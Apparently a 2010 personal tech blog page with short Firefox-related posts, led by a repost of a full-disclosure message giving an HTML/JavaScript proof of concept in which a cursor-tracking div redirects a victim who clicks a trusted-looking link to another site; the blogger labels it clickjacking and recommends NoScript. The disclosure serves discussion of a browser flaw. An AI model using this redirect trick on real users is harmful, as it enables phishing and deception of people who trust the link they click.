Phishing or Clickjacking?

Posted: February 26th, 2010 | Author: | Filed under: IT Related | Tags: , , , | 2 Comments »

I was about to shutdown my machine and go to sleep but suddenly my RSS reader popping up new feeds.

Here is one thing that made me smile:

Mozilla firefox 3.6 unpatched phishing vulnerability

From: bugsbanned () hushmail com
Date: Wed, 24 Feb 2010 19:29:33 -0300

…Unpatched bug since Mozilla firefox 3.0…

Mozilla “INsecurity team” remember, security through obscurity just
DOESN’T WORK…
Locking down bugzilla advisories even the 2 years old ones is
unnecessary and lame.

<html>
<body>
<div id=”mydiv”
onmouseover=”document.location=’http://Maliciouswebsite’;”
style=”position:absolute;width:2px;height:2px;background:#FFFFFF;bor
der:0px”></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById(‘mydiv’).style.left=mouseX-1;
document.getElementById(‘mydiv’).style.top=mouseY-1;
}
</script>
<br>
<a href=”http://trustedwebsite”; onclick=”updatebox(event)”><font
style=”font-family:arial;font-size:32px”>http://trusted
website</font></a><br>

</div>
</body>
</html>

For example:

<html>
<body>
<div id=”mydiv”
onmouseover=”document.location=’http://www.wikipedia.org’;”
style=”position:absolute;width:2px;height:2px;background:#FFFFFF;bor
der:0px”></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById(‘mydiv’).style.left=mouseX-1;
document.getElementById(‘mydiv’).style.top=mouseY-1;
}
</script>
<br>
<a href=”http://www.google.com”; onclick=”updatebox(event)”><font
style=”font-family:arial;font-
size:32px”>http://www.google.com</font></a><br>

</div>
</body>
</html>

Source:www exploit-db com

Phishing huh? To me its clickjacking πŸ™‚

Source: http://seclists.org/fulldisclosure/2010/Feb/434

P/S: Owh ya, NoScript is one of my best friend and he wants to be your best friend to πŸ˜‰


XandaForceHTTPS Updated

Posted: February 25th, 2010 | Author: | Filed under: IT Related | Tags: , , , | No Comments »

XandaForceHTTPS updated. Now with Firefox 3.6.* support. Requested by LinuxMalaysia

Read more HERE


Pen Testing the Web With Firefox

Posted: February 19th, 2010 | Author: | Filed under: IT Related | Tags: , , , , , , | 4 Comments »

Nice write up by Michael β€œtheprez98” Schearer



Get the PDF file HERE


Screengrab!

Posted: December 28th, 2009 | Author: | Filed under: IT Related | Tags: , , , | 4 Comments »

Interested to do something like this :-

Get Screengrab! an extension that makes it easy to save a web-page as an image – it’s a screen capture tool for Firefox!

With it, you can save anything that you can see in a browser window – from a small selection, to a complete page.

P/S: It works fine on my Ubuntu and my Mac πŸ˜‰


Please Upgrade to Firefox 3.0.15 or 3.5.4

Posted: October 28th, 2009 | Author: | Filed under: IT Related | Tags: , , , , | No Comments »

Have you update your Firefox? Kindly tell me if you haven’t πŸ˜‰

Naahh.. Just kidding.. Updates are available now.. Patch.. Patch.. and Patch.. Before its too late

Read more here:

[credit: IMG source]